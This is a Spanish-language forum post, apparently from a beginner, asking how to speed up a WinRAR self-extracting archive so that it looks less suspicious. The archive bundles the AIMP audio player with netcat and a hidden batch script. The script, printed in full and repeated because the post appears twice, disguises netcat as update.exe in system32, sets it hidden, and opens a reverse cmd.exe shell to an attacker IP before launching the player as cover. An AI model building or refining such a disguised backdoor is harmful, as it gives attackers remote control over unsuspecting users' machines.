Soy bastante principiante si..
Antes de empezar quiero aclarar que todo me funciono, el problema es que al hacer doble click en el autoextraible, tarda como 5 segundos en hacer todo ,y queda sospechoso.
Hice un autoextraible SFX con el Winrar, en donde meti 3 programas:
- AIMP_2.10.exe
- netcat.exe
- instrucciones.exe
El AIMP es el reproductor de audio.
El archivo instrucciones.exe lo escribi en .bat y lo compile con el QuickBFC para que se ejecute en modo oculto (o ghost). Y dice:
---------
@echo off
copy netcat.exe %SystemRoot%\system32\update.exe
del netcat.exe
cd %SystemRoot%\system32
attrib +H +S update.exe
start /B %SystemRoot%\system32\update -d -e cmd.exe 192.168.1.101 8888
cd %HomeDrive%\tmp
start AIMP_2.10.exe
---------
Para eso yo desde mi maquina atacante ya estoy escuchando en el puerto 8888 . Y el auto-extraible lo abro desde una maquina victima en el VirtualBox.
Es decir que el auto-extraible lo que hace es descomprimir los archivos en una carpeta temporal (c:\tmp) y ejecutar el archivo "instrucciones.exe". Pero tarda como 5 segundos obtener la shell y recien abrir el AIMP_2.10.exe
Pero si yo en vez de abrir el auto-extraible , extraigo los archivos a una carpeta y ejecuto el "instrucciones.exe" , pasa todo en un instante.
Por lo que deduzco que el problema esta en el auto-extraible .. Queria consultarles si estoy errado, y si puedo hacer algo para agilizar el proceso
Antes de empezar quiero aclarar que todo me funciono, el problema es que al hacer doble click en el autoextraible, tarda como 5 segundos en hacer todo ,y queda sospechoso.
Hice un autoextraible SFX con el Winrar, en donde meti 3 programas:
- AIMP_2.10.exe
- netcat.exe
- instrucciones.exe
El AIMP es el reproductor de audio.
El archivo instrucciones.exe lo escribi en .bat y lo compile con el QuickBFC para que se ejecute en modo oculto (o ghost). Y dice:
---------
@echo off
copy netcat.exe %SystemRoot%\system32\update.exe
del netcat.exe
cd %SystemRoot%\system32
attrib +H +S update.exe
start /B %SystemRoot%\system32\update -d -e cmd.exe 192.168.1.101 8888
cd %HomeDrive%\tmp
start AIMP_2.10.exe
---------
Para eso yo desde mi maquina atacante ya estoy escuchando en el puerto 8888 . Y el auto-extraible lo abro desde una maquina victima en el VirtualBox.
Es decir que el auto-extraible lo que hace es descomprimir los archivos en una carpeta temporal (c:\tmp) y ejecutar el archivo "instrucciones.exe". Pero tarda como 5 segundos obtener la shell y recien abrir el AIMP_2.10.exe
Pero si yo en vez de abrir el auto-extraible , extraigo los archivos a una carpeta y ejecuto el "instrucciones.exe" , pasa todo en un instante.
Por lo que deduzco que el problema esta en el auto-extraible .. Queria consultarles si estoy errado, y si puedo hacer algo para agilizar el proceso